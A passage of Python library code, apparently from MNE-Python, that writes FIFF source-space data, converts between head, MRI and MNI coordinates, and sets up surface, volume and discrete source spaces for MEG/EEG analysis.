write_int_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_TRIANGLES,
this['tris'] + 1)
if this['type'] != 'vol' and this['use_tris'] is not None:
# Use triangulation
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE_TRI, this['nuse_tri'])
write_int_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_USE_TRIANGLES,
this['use_tris'] + 1)
if this['type'] == 'vol':
neighbor_vert = this.get('neighbor_vert', None)
if neighbor_vert is not None:
nneighbors = np.array([len(n) for n in neighbor_vert])
neighbors = np.concatenate(neighbor_vert)
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NNEIGHBORS, nneighbors)
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEIGHBORS, neighbors)
write_coord_trans(fid, this['src_mri_t'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_VOXEL_DIMS, this['shape'])
start_block(fid, FIFF.FIFFB_MNE_PARENT_MRI_FILE)
write_coord_trans(fid, this['mri_ras_t'])
write_coord_trans(fid, this['vox_mri_t'])
mri_volume_name = this.get('mri_volume_name', None)
if mri_volume_name is not None:
write_string(fid, FIFF.FIFF_MNE_FILE_NAME, mri_volume_name)
mri_width, mri_height, mri_depth, nvox = _src_vol_dims(this)
interpolator = this.get('interpolator')
if interpolator is None:
interpolator = sparse.csr_matrix((nvox, this['np']))
write_float_sparse_rcs(fid, FIFF.FIFF_MNE_SOURCE_SPACE_INTERPOLATOR,
interpolator)
if 'mri_file' in this and this['mri_file'] is not None:
write_string(fid, FIFF.FIFF_MNE_SOURCE_SPACE_MRI_FILE,
this['mri_file'])
write_int(fid, FIFF.FIFF_MRI_WIDTH, mri_width)
write_int(fid, FIFF.FIFF_MRI_HEIGHT, mri_height)
write_int(fid, FIFF.FIFF_MRI_DEPTH, mri_depth)
end_block(fid, FIFF.FIFFB_MNE_PARENT_MRI_FILE)
# Patch-related information
if this['nearest'] is not None:
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST, this['nearest'])
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST_DIST,
this['nearest_dist'])
# Distances
if this['dist'] is not None:
# Save only upper triangular portion of the matrix
dists = this['dist'].copy()
dists = sparse.triu(dists, format=dists.format)
write_float_sparse_rcs(fid, FIFF.FIFF_MNE_SOURCE_SPACE_DIST, dists)
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_DIST_LIMIT,
this['dist_limit'])
# Segmentation data
if this['type'] == 'vol' and ('seg_name' in this):
# Save the name of the segment
write_string(fid, FIFF.FIFF_COMMENT, this['seg_name'])
##############################################################################
# Head to MRI volume conversion
@verbose
def head_to_mri(pos, subject, mri_head_t, subjects_dir=None,
verbose=None):
"""Convert pos from head coordinate system to MRI ones.
This function converts to MRI RAS coordinates and not to surface
RAS.
Parameters
----------
pos : array, shape (n_pos, 3)
The coordinates (in m) in head coordinate system.
%(subject)s
mri_head_t : instance of Transform
MRI<->Head coordinate transformation.
%(subjects_dir)s
%(verbose)s
Returns
-------
coordinates : array, shape (n_pos, 3)
The MRI RAS coordinates (in mm) of pos.
Notes
-----
This function requires nibabel.
"""
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
t1_fname = op.join(subjects_dir, subject, 'mri', 'T1.mgz')
head_mri_t = _ensure_trans(mri_head_t, 'head', 'mri')
_, _, mri_ras_t, _, _ = _read_mri_info(t1_fname)
head_ras_t = combine_transforms(head_mri_t, mri_ras_t, 'head', 'ras')
return 1e3 * apply_trans(head_ras_t, pos) # mm
##############################################################################
# Surface to MNI conversion
@verbose
def vertex_to_mni(vertices, hemis, subject, subjects_dir=None, verbose=None):
"""Convert the array of vertices for a hemisphere to MNI coordinates.
Parameters
----------
vertices : int, or list of int
Vertex number(s) to convert.
hemis : int, or list of int
Hemisphere(s) the vertices belong to.
%(subject)s
subjects_dir : str, or None
Path to SUBJECTS_DIR if it is not set in the environment.
%(verbose)s
Returns
-------
coordinates : array, shape (n_vertices, 3)
The MNI coordinates (in mm) of the vertices.
"""
singleton = False
if not isinstance(vertices, list) and not isinstance(vertices, np.ndarray):
singleton = True
vertices = [vertices]
if not isinstance(hemis, list) and not isinstance(hemis, np.ndarray):
hemis = [hemis] * len(vertices)
if not len(hemis) == len(vertices):
raise ValueError('hemi and vertices must match in length')
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
surfs = [op.join(subjects_dir, subject, 'surf', '%s.white' % h)
for h in ['lh', 'rh']]
# read surface locations in MRI space
rr = [read_surface(s)[0] for s in surfs]
# take point locations in MRI space and convert to MNI coordinates
xfm = read_talxfm(subject, subjects_dir)
xfm['trans'][:3, 3] *= 1000. # m->mm
data = np.array([rr[h][v, :] for h, v in zip(hemis, vertices)])
if singleton:
data = data[0]
return apply_trans(xfm['trans'], data)
##############################################################################
# Volume to MNI conversion
@verbose
def head_to_mni(pos, subject, mri_head_t, subjects_dir=None,
verbose=None):
"""Convert pos from head coordinate system to MNI ones.
Parameters
----------
pos : array, shape (n_pos, 3)
The coordinates (in m) in head coordinate system.
%(subject)s
mri_head_t : instance of Transform
MRI<->Head coordinate transformation.
%(subjects_dir)s
%(verbose)s
Returns
-------
coordinates : array, shape (n_pos, 3)
The MNI coordinates (in mm) of pos.
Notes
-----
This function requires either nibabel.
"""
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
# before we go from head to MRI (surface RAS)
head_mni_t = combine_transforms(
_ensure_trans(mri_head_t, 'head', 'mri'),
read_talxfm(subject, subjects_dir), 'head', 'mni_tal')
return apply_trans(head_mni_t, pos) * 1000.
@verbose
def read_talxfm(subject, subjects_dir=None, verbose=None):
"""Compute MRI-to-MNI transform from FreeSurfer talairach.xfm file.
Parameters
----------
%(subject)s
%(subjects_dir)s
%(verbose)s
Returns
-------
mri_mni_t : instance of Transform
The affine transformation from MRI to MNI space for the subject.
"""
# Adapted from freesurfer m-files. Altered to deal with Norig
# and Torig correctly
subjects_dir = get_subjects_dir(subjects_dir)
# Setup the RAS to MNI transform
ras_mni_t = read_ras_mni_t(subject, subjects_dir)
ras_mni_t['trans'][:3, 3] /= 1000. # mm->m
# We want to get from Freesurfer surface RAS ('mri') to MNI ('mni_tal').
# This file only gives us RAS (non-zero origin) ('ras') to MNI ('mni_tal').
# Se we need to get the ras->mri transform from the MRI headers.
# To do this, we get Norig and Torig
# (i.e. vox_ras_t and vox_mri_t, respectively)
path = op.join(subjects_dir, subject, 'mri', 'orig.mgz')
if not op.isfile(path):
path = op.join(subjects_dir, subject, 'mri', 'T1.mgz')
if not op.isfile(path):
raise IOError('mri not found: %s' % path)
_, _, mri_ras_t, _, _ = _read_mri_info(path)
mri_mni_t = combine_transforms(mri_ras_t, ras_mni_t, 'mri', 'mni_tal')
return mri_mni_t
def _read_mri_info(path, units='m', return_img=False, use_nibabel=False):
# This is equivalent but 100x slower, so only use nibabel if we need to
# (later):
if use_nibabel:
import nibabel
hdr = nibabel.load(path).header
n_orig = hdr.get_vox2ras()
t_orig = hdr.get_vox2ras_tkr()
dims = hdr.get_data_shape()
zooms = hdr.get_zooms()[:3]
else:
hdr = _get_mgz_header(path)
n_orig = hdr['vox2ras']
t_orig = hdr['vox2ras_tkr']
dims = hdr['dims']
zooms = hdr['zooms']
# extract the MRI_VOXEL to RAS (non-zero origin) transform
vox_ras_t = Transform('mri_voxel', 'ras', n_orig)
# extract the MRI_VOXEL to MRI transform
vox_mri_t = Transform('mri_voxel', 'mri', t_orig)
# construct the MRI to RAS (non-zero origin) transform
mri_ras_t = combine_transforms(
invert_transform(vox_mri_t), vox_ras_t, 'mri', 'ras')
assert units in ('m', 'mm')
if units == 'm':
conv = np.array([[1e-3, 1e-3, 1e-3, 1]]).T
# scaling and translation terms
vox_ras_t['trans'] *= conv
vox_mri_t['trans'] *= conv
# just the translation term
mri_ras_t['trans'][:, 3:4] *= conv
out = (vox_ras_t, vox_mri_t, mri_ras_t, dims, zooms)
if return_img:
nibabel = _import_nibabel()
out += (nibabel.load(path),)
return out
###############################################################################
# Creation and decimation
@verbose
def _check_spacing(spacing, verbose=None):
"""Check spacing parameter."""
# check to make sure our parameters are good, parse 'spacing'
types = ('a string with values "ico#", "oct#", "all", or an int >= 2')
space_err = ('"spacing" must be %s, got type %s (%r)'
% (types, type(spacing), spacing))
if isinstance(spacing, str):
if spacing == 'all':
stype = 'all'
sval = ''
elif isinstance(spacing, str) and spacing[:3] in ('ico', 'oct'):
stype = spacing[:3]
sval = spacing[3:]
try:
sval = int(sval)
except Exception:
raise ValueError('%s subdivision must be an integer, got %r'
% (stype, sval))
lim = 0 if stype == 'ico' else 1
if sval < lim:
raise ValueError('%s subdivision must be >= %s, got %s'
% (stype, lim, sval))
else:
raise ValueError(space_err)
else:
stype = 'spacing'
sval = _ensure_int(spacing, 'spacing', types)
if sval < 2:
raise ValueError('spacing must be >= 2, got %d' % (sval,))
if stype == 'all':
logger.info('Include all vertices')
ico_surf = None
src_type_str = 'all'
else:
src_type_str = '%s = %s' % (stype, sval)
if stype == 'ico':
logger.info('Icosahedron subdivision grade %s' % sval)
ico_surf = _get_ico_surface(sval)
elif stype == 'oct':
logger.info('Octahedron subdivision grade %s' % sval)
ico_surf = _tessellate_sphere_surf(sval)
else:
assert stype == 'spacing'
logger.info('Approximate spacing %s mm' % sval)
ico_surf = sval
return stype, sval, ico_surf, src_type_str
@verbose
def setup_source_space(subject, spacing='oct6', surface='white',
subjects_dir=None, add_dist=True, n_jobs=1,
verbose=None):
"""Set up bilateral hemisphere surface-based source space with subsampling.
Parameters
----------
%(subject)s
spacing : str
The spacing to use. Can be ``'ico#'`` for a recursively subdivided
icosahedron, ``'oct#'`` for a recursively subdivided octahedron,
``'all'`` for all points, or an integer to use approximate
distance-based spacing (in mm).
.. versionchanged:: 0.18
Support for integers for distance-based spacing.
surface : str
The surface to use.
%(subjects_dir)s
add_dist : bool | str
Add distance and patch information to the source space. This takes some
time so precomputing it is recommended. Can also be 'patch' to only
compute patch information (requires SciPy 1.3+).
.. versionchanged:: 0.20
Support for add_dist='patch'.
%(n_jobs)s
Ignored if ``add_dist=='patch'``.
%(verbose)s
Returns
-------
src : SourceSpaces
The source space for each hemisphere.
See Also
--------
setup_volume_source_space
"""
cmd = ('setup_source_space(%s, spacing=%s, surface=%s, '
'subjects_dir=%s, add_dist=%s, verbose=%s)'
% (subject, spacing, surface, subjects_dir, add_dist, verbose))
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
surfs = [op.join(subjects_dir, subject, 'surf', hemi + surface)
for hemi in ['lh.', 'rh.']]
for surf, hemi in zip(surfs, ['LH', 'RH']):
if surf is not None and not op.isfile(surf):
raise IOError('Could not find the %s surface %s'
% (hemi, surf))
logger.info('Setting up the source space with the following parameters:\n')
logger.info('SUBJECTS_DIR = %s' % subjects_dir)
logger.info('Subject = %s' % subject)
logger.info('Surface = %s' % surface)
stype, sval, ico_surf, src_type_str = _check_spacing(spacing)
logger.info('')
del spacing
logger.info('>>> 1. Creating the source space...\n')
# mne_make_source_space ... actually make the source spaces
src = []
# pre-load ico/oct surf (once) for speed, if necessary
if stype not in ('spacing', 'all'):
logger.info('Doing the %shedral vertex picking...'
% (dict(ico='icosa', oct='octa')[stype],))
for hemi, surf in zip(['lh', 'rh'], surfs):
logger.info('Loading %s...' % surf)
# Setup the surface spacing in the MRI coord frame
if stype != 'all':
logger.info('Mapping %s %s -> %s (%d) ...'
% (hemi, subject, stype, sval))
s = _create_surf_spacing(surf, hemi, subject, stype, ico_surf,
subjects_dir)
logger.info('loaded %s %d/%d selected to source space (%s)'
% (op.split(surf)[1], s['nuse'], s['np'], src_type_str))
src.append(s)
logger.info('') # newline after both subject types are run
# Fill in source space info
hemi_ids = [FIFF.FIFFV_MNE_SURF_LEFT_HEMI, FIFF.FIFFV_MNE_SURF_RIGHT_HEMI]
for s, s_id in zip(src, hemi_ids):
# Add missing fields
s.update(dict(dist=None, dist_limit=None, nearest=None, type='surf',
nearest_dist=None, pinfo=None, patch_inds=None, id=s_id,
coord_frame=FIFF.FIFFV_COORD_MRI))
s['rr'] /= 1000.0
del s['tri_area']
del s['tri_cent']
del s['tri_nn']
del s['neighbor_tri']
# upconvert to object format from lists
src = SourceSpaces(src, dict(working_dir=os.getcwd(), command_line=cmd))
if add_dist:
dist_limit = 0. if add_dist == 'patch' else np.inf
add_source_space_distances(src, dist_limit=dist_limit,
n_jobs=n_jobs, verbose=verbose)
# write out if requested, then return the data
logger.info('You are now one step closer to computing the gain matrix')
return src
def _check_mri(mri, subject, subjects_dir):
_validate_type(mri, 'path-like', 'mri')
if not op.isfile(mri):
if subject is None:
raise FileNotFoundError(
'MRI file %r not found and no subject provided' % (mri,))
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
mri = op.join(subjects_dir, subject, 'mri', mri)
if not op.isfile(mri):
raise FileNotFoundError('MRI file %r not found' % (mri,))
return mri
def _check_volume_labels(volume_label, mri, name='volume_label'):
_validate_type(mri, 'path-like', 'mri when %s is not None' % (name,))
mri = _check_fname(mri, overwrite='read', must_exist=True)
if isinstance(volume_label, str):
volume_label = [volume_label]
_validate_type(volume_label, (list, tuple, dict), name) # should be
if not isinstance(volume_label, dict):
# Turn it into a dict
if not mri.endswith('aseg.mgz'):
raise RuntimeError(
'Must use a *aseg.mgz file unless %s is a dict, got %s'
% (name, op.basename(mri)))
lut, _ = read_freesurfer_lut()
use_volume_label = dict()
for label in volume_label:
if label not in lut:
raise ValueError(
'Volume %r not found in file %s. Double check '
'FreeSurfer lookup table.%s'
% (label, mri, _suggest(label, lut)))
use_volume_label[label] = lut[label]
volume_label = use_volume_label
for label, id_ in volume_label.items():
_validate_type(label, str, 'volume_label keys')
_validate_type(id_, 'int-like', 'volume_labels[%r]' % (label,))
volume_label = {k: _ensure_int(v) for k, v in volume_label.items()}
return volume_label
@verbose
def setup_volume_source_space(subject=None, pos=5.0, mri=None,
sphere=None, bem=None,
surface=None, mindist=5.0, exclude=0.0,
subjects_dir=None, volume_label=None,
add_interpolator=True, sphere_units='m',
single_volume=False, verbose=None):
"""Set up a volume source space with grid spacing or discrete source space.
Parameters
----------
subject : str | None
Subject to process. If None, the path to the MRI volume must be
absolute to get a volume source space. If a subject name
is provided the T1.mgz file will be found automatically.
Defaults to None.
pos : float | dict
Positions to use for sources. If float, a grid will be constructed
with the spacing given by ``pos`` in mm, generating a volume source
space. If dict, pos['rr'] and pos['nn'] will be used as the source
space locations (in meters) and normals, respectively, creating a
discrete source space.
.. note:: For a discrete source space (``pos`` is a dict),
``mri`` must be None.
mri : str | None
The filename of an MRI volume (mgh or mgz) to create the
interpolation matrix over. Source estimates obtained in the
volume source space can then be morphed onto the MRI volume
using this interpolator. If pos is a dict, this cannot be None.
If subject name is provided, ``pos`` is a float or ``volume_label``
are not provided then the ``mri`` parameter will default to 'T1.mgz'
or ``aseg.mgz``, respectively, else it will stay None.
sphere : ndarray, shape (4,) | ConductorModel | None
Define spherical source space bounds using origin and radius given
by (ox, oy, oz, rad) in ``sphere_units``.
Only used if ``bem`` and ``surface`` are both None. Can also be a
spherical ConductorModel, which will use the origin and radius.
None (the default) uses a head-digitization fit.
bem : str | None | ConductorModel
Define source space bounds using a BEM file (specifically the inner
skull surface) or a ConductorModel for a 1-layer of 3-layers BEM.
surface : str | dict | None
Define source space bounds using a FreeSurfer surface file. Can
also be a dictionary with entries ``'rr'`` and ``'tris'``, such as
those returned by :func:`mne.read_surface`.
mindist : float
Exclude points closer than this distance (mm) to the bounding surface.
exclude : float
Exclude points closer than this distance (mm) from the center of mass
of the bounding surface.
%(subjects_dir)s
volume_label : str | dict | list | None
Region(s) of interest to use. None (default) will create a single
whole-brain source space. Otherwise, a separate source space will be
created for each entry in the list or dict (str will be turned into
a single-element list). If list of str, standard Freesurfer labels
are assumed. If dict, should be a mapping of region names to atlas
id numbers, allowing the use of other atlases.
.. versionchanged:: 0.21.0
Support for dict added.
add_interpolator : bool
If True and ``mri`` is not None, then an interpolation matrix
will be produced.
sphere_units : str
Defaults to ``"m"``.
.. versionadded:: 0.20
single_volume : bool
If True, multiple values of ``volume_label`` will be merged into a
a single source space instead of occupying multiple source spaces
(one for each sub-volume), i.e., ``len(src)`` will be ``1`` instead of
``len(volume_label)``. This can help conserve memory and disk space
when many labels are used.
.. versionadded:: 0.21
%(verbose)s
Returns
-------
src : SourceSpaces
A :class:`SourceSpaces` object containing one source space for each
entry of ``volume_labels``, or a single source space if
``volume_labels`` was not specified.
See Also
--------
setup_source_space
Notes
-----
Volume source spaces are related to an MRI image such as T1 and allow to
visualize source estimates overlaid on MRIs and to morph estimates
to a template brain for group analysis. Discrete source spaces
don't allow this. If you provide a subject name the T1 MRI will be
used by default.
When you work with a source space formed from a grid you need to specify
the domain in which the grid will be defined. There are three ways
of specifying this:
(i) sphere, (ii) bem model, and (iii) surface.
The default behavior is to use sphere model
(``sphere=(0.0, 0.0, 0.0, 90.0)``) if ``bem`` or ``surface`` is not
``None`` then ``sphere`` is ignored.
If you're going to use a BEM conductor model for forward model
it is recommended to pass it here.
To create a discrete source space, ``pos`` must be a dict, ``mri`` must be
None, and ``volume_label`` must be None. To create a whole brain volume
source space, ``pos`` must be a float and 'mri' must be provided.
To create a volume source space from label, ``pos`` must be a float,
``volume_label`` must be provided, and 'mri' must refer to a .mgh or .mgz
file with values corresponding to the freesurfer lookup-table (typically
``aseg.mgz``).
"""
subjects_dir = get_subjects_dir(subjects_dir)
_validate_type(
volume_label, (str, list, tuple, dict, None), 'volume_label')
if bem is not None and surface is not None:
raise ValueError('Only one of "bem" and "surface" should be '
'specified')
if mri is None and subject is not None:
if volume_label is not None:
mri = 'aseg.mgz'
elif _is_numeric(pos):
mri = 'T1.mgz'
if mri is not None:
mri = _check_mri(mri, subject, subjects_dir)
if isinstance(pos, dict):
raise ValueError('Cannot create interpolation matrix for '
'discrete source space, mri must be None if '
'pos is a dict')
if volume_label is not None:
volume_label = _check_volume_labels(volume_label, mri)
assert volume_label is None or isinstance(volume_label, dict)
sphere = _check_sphere(sphere, sphere_units=sphere_units)
# triage bounding argument
if bem is not None:
logger.info('BEM : %s', bem)
elif surface is not None:
if isinstance(surface, dict):
if not all(key in surface for key in ['rr', 'tris']):
raise KeyError('surface, if dict, must have entries "rr" '
'and "tris"')
# let's make sure we have geom info
complete_surface_info(surface, copy=False, verbose=False)
surf_extra = 'dict()'
elif isinstance(surface, str):
if not op.isfile(surface):
raise IOError('surface file "%s" not found' % surface)
surf_extra = surface
logger.info('Boundary surface file : %s', surf_extra)
else:
logger.info('Sphere : origin at (%.1f %.1f %.1f) mm'
% (1000 * sphere[0], 1000 * sphere[1], 1000 * sphere[2]))
logger.info(' radius : %.1f mm' % (1000 * sphere[3],))
# triage pos argument
if isinstance(pos, dict):
if not all(key in pos for key in ['rr', 'nn']):
raise KeyError('pos, if dict, must contain "rr" and "nn"')
pos_extra = 'dict()'
else: # pos should be float-like
try:
pos = float(pos)
except (TypeError, ValueError):
raise ValueError('pos must be a dict, or something that can be '
'cast to float()')
if not isinstance(pos, float):
logger.info('Source location file : %s', pos_extra)
logger.info('Assuming input in millimeters')
logger.info('Assuming input in MRI coordinates')
if isinstance(pos, float):
logger.info('grid : %.1f mm' % pos)
logger.info('mindist : %.1f mm' % mindist)
pos /= 1000.0 # convert pos from m to mm
if exclude > 0.0:
logger.info('Exclude : %.1f mm' % exclude)
vol_info = dict()
if mri is not None:
logger.info('MRI volume : %s' % mri)
logger.info('')
logger.info('Reading %s...' % mri)
vol_info = _get_mri_info_data(mri, data=volume_label is not None)
exclude /= 1000.0 # convert exclude from m to mm
logger.info('')
# Explicit list of points
if not isinstance(pos, float):
# Make the grid of sources
sp = [_make_discrete_source_space(pos)]
else:
# Load the brain surface as a template
if isinstance(bem, str):
# read bem surface in the MRI coordinate frame
surf = read_bem_surfaces(bem, s_id=FIFF.FIFFV_BEM_SURF_ID_BRAIN,
verbose=False)
logger.info('Loaded inner skull from %s (%d nodes)'
% (bem, surf['np']))
elif bem is not None and bem.get('is_sphere') is False:
# read bem surface in the MRI coordinate frame
which = np.where([surf['id'] == FIFF.FIFFV_BEM_SURF_ID_BRAIN
for surf in bem['surfs']])[0]
if len(which) != 1:
raise ValueError('Could not get inner skull surface from BEM')
surf = bem['surfs'][which[0]]
assert surf['id'] == FIFF.FIFFV_BEM_SURF_ID_BRAIN
if surf['coord_frame'] != FIFF.FIFFV_COORD_MRI:
raise ValueError('BEM is not in MRI coordinates, got %s'
% (_coord_frame_name(surf['coord_frame']),))
logger.info('Taking inner skull from %s' % bem)
elif surface is not None:
if isinstance(surface, str):
# read the surface in the MRI coordinate frame
surf = read_surface(surface, return_dict=True)[-1]
else:
surf = surface
logger.info('Loaded bounding surface from %s (%d nodes)'
% (surface, surf['np']))
surf = deepcopy(surf)
surf['rr'] *= 1e-3 # must be converted to meters
else: # Load an icosahedron and use that as the surface
logger.info('Setting up the sphere...')
surf = dict(R=sphere[3], r0=sphere[:3])
# Make the grid of sources in MRI space
sp = _make_volume_source_space(
surf, pos, exclude, mindist, mri, volume_label,
vol_info=vol_info, single_volume=single_volume)
del sphere
assert isinstance(sp, list)
assert len(sp) == 1 if (volume_label is None or
single_volume) else len(volume_label)
# Compute an interpolation matrix to show data in MRI_VOXEL coord frame
if mri is not None:
if add_interpolator:
_add_interpolator(sp)
elif sp[0]['type'] == 'vol':
# If there is no interpolator, it's actually a discrete source space
sp[0]['type'] = 'discrete'
# do some cleaning
if volume_label is None and 'seg_name' in sp[0]:
del sp[0]['seg_name']
for s in sp:
if 'vol_dims' in s:
del s['vol_dims']
# Save it
sp = _complete_vol_src(sp, subject)
return sp
def _complete_vol_src(sp, subject=None):
for s in sp:
s.update(dict(nearest=None, dist=None, use_tris=None, patch_inds=None,
dist_limit=None, pinfo=None, ntri=0, nearest_dist=None,
nuse_tri=0, tris=None, subject_his_id=subject))
sp = SourceSpaces(sp, dict(working_dir=os.getcwd(), command_line='None'))
return sp
def _make_voxel_ras_trans(move, ras, voxel_size):
"""Make a transformation from MRI_VOXEL to MRI surface RAS (i.e. MRI)."""
assert voxel_size.ndim == 1
assert voxel_size.size == 3
rot = ras.T * voxel_size[np.newaxis, :]
assert rot.ndim == 2
assert rot.shape[0] == 3
assert rot.shape[1] == 3
trans = np.c_[np.r_[rot, np.zeros((1, 3))], np.r_[move, 1.0]]
t = Transform('mri_voxel', 'mri', trans)
return t
def _make_discrete_source_space(pos, coord_frame='mri'):
"""Use a discrete set of source locs/oris to make src space.
Parameters
----------
pos : dict
Must have entries "rr" and "nn". Data should be in meters.
coord_frame : str
The coordinate frame in which the positions are given; default: 'mri'.
The frame must be one defined in transforms.py:_str_to_frame
Returns
-------
src : dict
The source space.
"""
# Check that coordinate frame is valid
if coord_frame not in _str_to_frame: # will fail if coord_frame not string
raise KeyError('coord_frame must be one of %s, not "%s"'
% (list(_str_to_frame.keys()), coord_frame))
coord_frame = _str_to_frame[coord_frame] # now an int
# process points (copy and cast)
rr = np.array(pos['rr'], float)
nn = np.array(pos['nn'], float)
if not (rr.ndim == nn.ndim == 2 and nn.shape[0] == nn.shape[0] and
rr.shape[1] == nn.shape[1]):
raise RuntimeError('"rr" and "nn" must both be 2D arrays with '
'the same number of rows and 3 columns')
npts = rr.shape[0]
_normalize_vectors(nn)
nz = np.sum(np.sum(nn * nn, axis=1) == 0)
if nz != 0:
raise RuntimeError('%d sources have zero length normal' % nz)
logger.info('Positions (in meters) and orientations')
logger.info('%d sources' % npts)
# Ready to make the source space
sp = dict(coord_frame=coord_frame, type='discrete', nuse=npts, np=npts,
inuse=np.ones(npts, int), vertno=np.arange(npts), rr=rr, nn=nn,
id=-1)
return sp
def _import_nibabel(why='use MRI files'):
try:
import nibabel as nib
except ImportError as exp:
msg = 'nibabel is required to %s, got:\n%s' % (why, exp)
else:
msg = ''
if msg:
raise ImportError(msg)
return nib
def _mri_orientation(img, orientation):
"""Get MRI orientation information from an image.
Parameters
----------
img : instance of SpatialImage
The MRI image.
orientation : str
Orientation that you want. Can be "axial", "saggital", or "coronal".
Returns
-------
xyz : tuple, shape (3,)
The dimension indices for X, Y, and Z.
flips : tuple, shape (3,)
Whether each dimension requires a flip.
order : tuple, shape (3,)
The resulting order of the data if the given ``xyz`` and ``flips``
are used.
Notes
-----
.. versionadded:: 0.21
"""
import nibabel as nib
_validate_type(img, nib.spatialimages.SpatialImage)
_check_option('orientation', orientation, ('coronal', 'axial', 'sagittal'))
axcodes = ''.join(nib.orientations.aff2axcodes(img.affine))
flips = {o: (1 if o in axcodes else -1) for o in 'RAS'}
axcodes = axcodes.replace('L', 'R').replace('P', 'A').replace('I', 'S')
order = dict(
coronal=('R', 'S', 'A'),
axial=('R', 'A', 'S'),
sagittal=('A', 'S', 'R'),
)[orientation]
xyz = tuple(axcodes.index(c) for c in order)
flips = tuple(flips[c] for c in order)
return xyz, flips, order
def _get_mri_info_data(mri, data):
# Read the segmentation data using nibabel
if data:
_import_nibabel('load MRI atlas data')
out = dict()
_, out['vox_mri_t'], out['mri_ras_t'], dims, _, mgz = _read_mri_info(
mri, return_img=True)
out.update(
mri_width=dims[0], mri_height=dims[1],
mri_depth=dims[1], mri_volume_name=mri)
if data:
assert mgz is not None
out['mri_vox_t'] = invert_transform(out['vox_mri_t'])
out['data'] = np.asarray(mgz.dataobj)
return out
def _get_atlas_values(vol_info, rr):
# Transform MRI coordinates (where our surfaces live) to voxels
rr_vox = apply_trans(vol_info['mri_vox_t'], rr)
good = ((rr_vox >= -.5) &
(rr_vox < np.array(vol_info['data'].shape, int) - 0.5)).all(-1)
idx = np.round(rr_vox[good].T).astype(np.int64)
values = np.full(rr.shape[0], np.nan)
values[good] = vol_info['data'][tuple(idx)]
return values
def _make_volume_source_space(surf, grid, exclude, mindist, mri=None,
volume_labels=None, do_neighbors=True, n_jobs=1,
vol_info={}, single_volume=False):
"""Make a source space which covers the volume bounded by surf."""
# Figure out the grid size in the MRI coordinate frame
if 'rr' in surf:
mins = np.min(surf['rr'], axis=0)
maxs = np.max(surf['rr'], axis=0)
cm = np.mean(surf['rr'], axis=0) # center of mass
maxdist = np.linalg.norm(surf['rr'] - cm, axis=1).max()
else:
mins = surf['r0'] - surf['R']
maxs = surf['r0'] + surf['R']
cm = surf['r0'].copy()
maxdist = surf['R']
# Define the sphere which fits the surface
logger.info('Surface CM = (%6.1f %6.1f %6.1f) mm'
% (1000 * cm[0], 1000 * cm[1], 1000 * cm[2]))
logger.info('Surface fits inside a sphere with radius %6.1f mm'
% (1000 * maxdist))
logger.info('Surface extent:')
for c, mi, ma in zip('xyz', mins, maxs):
logger.info(' %s = %6.1f ... %6.1f mm'
% (c, 1000 * mi, 1000 * ma))
maxn = np.array([np.floor(np.abs(m) / grid) + 1 if m > 0 else -
np.floor(np.abs(m) / grid) - 1 for m in maxs], int)
minn = np.array([np.floor(np.abs(m) / grid) + 1 if m > 0 else -
np.floor(np.abs(m) / grid) - 1 for m in mins], int)
logger.info('Grid extent:')
for c, mi, ma in zip('xyz', minn, maxn):
logger.info(' %s = %6.1f ... %6.1f mm'
% (c, 1000 * mi * grid, 1000 * ma * grid))
# Now make the initial grid
ns = tuple(maxn - minn + 1)
npts = np.prod(ns)
nrow = ns[0]
ncol = ns[1]
nplane = nrow * ncol
# x varies fastest, then y, then z (can use unravel to do this)
rr = np.meshgrid(np.arange(minn[2], maxn[2] + 1),
np.arange(minn[1], maxn[1] + 1),
np.arange(minn[0], maxn[0] + 1), indexing='ij')
x, y, z = rr[2].ravel(), rr[1].ravel(), rr[0].ravel()
rr = np.array([x * grid, y * grid, z * grid]).T
sp = dict(np=npts, nn=np.zeros((npts, 3)), rr=rr,
inuse=np.ones(npts, bool), type='vol', nuse=npts,
coord_frame=FIFF.FIFFV_COORD_MRI, id=-1, shape=ns)
sp['nn'][:, 2] = 1.0
assert sp['rr'].shape[0] == npts
logger.info('%d sources before omitting any.', sp['nuse'])
# Exclude infeasible points
dists = np.linalg.norm(sp['rr'] - cm, axis=1)
bads = np.where(np.logical_or(dists < exclude, dists > maxdist))[0]
sp['inuse'][bads] = False
sp['nuse'] -= len(bads)
logger.info('%d sources after omitting infeasible sources not within '
'%0.1f - %0.1f mm.',
sp['nuse'], 1000 * exclude, 1000 * maxdist)
if 'rr' in surf:
_filter_source_spaces(surf, mindist, None, [sp], n_jobs)
else: # sphere
vertno = np.where(sp['inuse'])[0]
bads = (np.linalg.norm(sp['rr'][vertno] - surf['r0'], axis=-1) >=
surf['R'] - mindist / 1000.)
sp['nuse'] -= bads.sum()
sp['inuse'][vertno[bads]] = False
sp['vertno'] = np.where(sp['inuse'])[0]
del vertno
del surf
logger.info('%d sources remaining after excluding the sources outside '
'the surface and less than %6.1f mm inside.'
% (sp['nuse'], mindist))
# Restrict sources to volume of interest
if volume_labels is None:
sp['seg_name'] = 'the whole brain'
sps = [sp]
else:
if not do_neighbors:
raise RuntimeError('volume_label cannot be None unless '
'do_neighbors is True')
sps = list()
orig_sp = sp
# reduce the sizes when we deepcopy
for volume_label, id_ in volume_labels.items():
# this saves us some memory
memodict = dict()
for key in ('rr', 'nn'):
if key in orig_sp:
arr = orig_sp[key]
memodict[id(arr)] = arr
sp = deepcopy(orig_sp, memodict)
good = _get_atlas_values(vol_info, sp['rr'][sp['vertno']]) == id_
n_good = good.sum()
logger.info(' Selected %d voxel%s from %s'
% (n_good, _pl(n_good), volume_label))
# Update source info
sp['inuse'][sp['vertno'][~good]] = False
sp['vertno'] = sp['vertno'][good]
sp['nuse'] = sp['inuse'].sum()
sp['seg_name'] = volume_label
sp['mri_file'] = mri
sps.append(sp)
del orig_sp
